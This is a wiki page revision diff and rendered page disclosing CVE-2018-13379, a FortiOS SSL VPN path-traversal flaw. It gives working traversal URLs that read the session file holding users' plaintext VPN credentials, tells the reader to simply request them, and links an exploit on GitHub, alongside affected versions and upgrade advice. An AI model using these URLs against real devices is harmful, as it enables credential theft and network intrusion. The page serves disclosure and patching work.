|
Size: 854
Comment:
|
Size: 2019
Comment:
|
| Deletions are marked like this. | Additions are marked like this. |
| Line 1: | Line 1: |
| #acl All: | #acl All:read |
| Line 6: | Line 6: |
| Line 10: | Line 9: |
Proof of concept, if available. |
The next example URL's are responsible: |
| Line 14: | Line 12: |
| telnet 1.2.3.4 5678 | https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////////////////////////bin/sh https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd |
| Line 16: | Line 16: |
Just make a request to these URL's and you will get the information needed. Keep in mind that the length of the URL has to be this size. You can also find a proof of concept on [[https://github.com/milo2012/CVE-2018-13379|GitHub]] There is a strange fact that if you start a SSLVPN, you have to log in into the webportal on the internet facing part of the Fortigate. After a successful login, the device writes your IP address, username and password in plaintext to the temporary location ''/dev/cmdb/sslvpn_websession''. If you read this file, the current logged in users and passwords will be visible. |
|
| Line 21: | Line 26: |
| * FortiOS 5.4.12 and lower * FortiOS 5.6.10 and lower * FortiOS 6.0.5 and lower * FortiOS 6.2.1 and lower |
* FortiOS 6.0 - 6.0.0 to 6.0.4 * FortiOS 5.6 - 5.6.3 to 5.6.7 * FortiOS 5.4 - 5.4.6 to 5.4.12 |
| Line 27: | Line 31: |
| A list of all the possible mitigations. = Thanks = Thanks from |
Please upgrade! |
| Line 33: | Line 34: |
| * SecLists * [[URL]] * [[URL]] * Tweakers (Dutch) * [[URL]] |
* Fortigate * [[https://kb.fortinet.com/kb/documentLink.do?externalID=FD46513]] * Github * [[https://github.com/milo2012/CVE-2018-13379]] * Explaination exploit * [[https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html]] * [[https://medium.com/@valeriyshevchenko/critical-vulnerabilities-in-pulse-secure-and-fortinet-ssl-vpns-in-the-wild-internet-3991ea9e6481]] ---- CategoryNetwork |
General Disclosure
This is a path-traversal vulnerability in the FortiOS SSL VPN web portal that could potentially allow an unauthenticated attacker to download files through specially crafted HTTP resource requests. Fortinet advises customers to upgrade to FortiOS 5.4.13, 5.6.11, 6.0.6, 6.2.2.
POC
The next example URL's are responsible:
https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////////////////////////bin/sh https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
Just make a request to these URL's and you will get the information needed. Keep in mind that the length of the URL has to be this size. You can also find a proof of concept on GitHub
There is a strange fact that if you start a SSLVPN, you have to log in into the webportal on the internet facing part of the Fortigate. After a successful login, the device writes your IP address, username and password in plaintext to the temporary location /dev/cmdb/sslvpn_websession. If you read this file, the current logged in users and passwords will be visible.
Affected Systems
Here is a list of the operating systems we have tested which are vulnerable to this attack:
- FortiOS 6.0 - 6.0.0 to 6.0.4
- FortiOS 5.6 - 5.6.3 to 5.6.7
- FortiOS 5.4 - 5.4.6 to 5.4.12
Possible Mitigations
Please upgrade!
References
- Fortigate
- Github
- Explaination exploit